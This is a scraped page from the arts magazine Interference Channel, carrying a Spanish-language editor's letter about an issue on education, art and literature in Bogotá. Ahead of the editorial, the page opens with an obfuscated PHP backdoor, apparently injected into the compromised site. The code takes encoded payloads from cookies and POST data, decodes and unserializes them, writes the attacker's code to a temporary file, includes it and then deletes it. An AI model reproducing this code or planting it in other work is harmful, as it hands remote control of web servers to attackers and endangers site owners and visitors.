$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> El arte de educarse. – www.interferencechannel.com

El arte de educarse.

Decidimos hablar de educación en esta edición y para  hacerlo no pensé en un mejor artista  que Andrés Felipe Uribe, en su obra Andrés ha trabajado con seriedad y destreza dos temas que nos son pertinentes, la comunicación y la educación, declarado crítico del statu quo y el establecimiento en la comunicación y las artes visuales, Andrés habla en entrevista sobre su obra, la educación y la comunicación en las artes, y la invitación a ser portada de Interference Channel.

Tenemos también una entrevista con uno de los espacios más importantes de artes visuales de la ciudad Espacio El Dorado, Valentina Gutierrez nos habló de su espacio que ha tenido como misión desarrollar lazos entre países Andinos y de alguna manera poner en tela de juicio la geopolitica local, tradicionalmente enfocada en los Estados Unidos y Europa, de las artes visuales.

Hablando en literatura publicamos una entrevista con el escritor Juan Gabriel Vásquez, sobre la idea y el origen de la novela y el presente de la literatura. Así mismo Nicolás Ureta nos ilustra el poder futurista de Fellini con  su texto Frivolidad y Tormento en la Dolce Vita de Fellini.

Acompañando la crisis actual de la educación pública en el país invitamos a Jennifer Pedraza en alianza con Contravia, para hablar del Paro Estudiantil. Quisimos también hablar con la curadora de Arte Camara de este año, Carolina Ponce de León, Carolina ha tratado en esta versión de ArtBO de poner al revés la in-equidad de género y de darle una preponderancia a mujeres artistas.

Como contraportada estará un barrio del Sur Oriente de Bogotá, llamado San German. Un barrio en las inmediaciones del parque Entre Nubes, un barrio que encierra una comunidad de la periferia, a la deriva del tiempo y el Estado, cortesía del colectivo periodístico Por la Frontiere. 

No podría terminar sin señalar que el Espacio Odeon ha pasado a significar la vanguardia de las artes visuales en Bogotá y un espacio privado pensado para pensar y criticar el medio, los medios y nuestra cultura visual. Trabajos de alta calidad artística, curadurías impecables, diálogos geo-transversales y una visión amplia de lo público y de los usos del espacio lo hacen uno de los mejores lugares para pensar y entender las artes visuales en Colombia

La educación está en crisis, el concepto de lo público está en crisis, desde las artes visuales y la cultura, que cubrimos en IC pensamos que problematizar la cultura es un camino pertinente en el momento social y político que vivimos, son las audacias del humanismo las que nos permitirán salir adelante en medio de fascismos contemporáneos y presentes inciertos de posverdad.♦

 

Diego Aretz

Editor y fundador.

Comments are closed.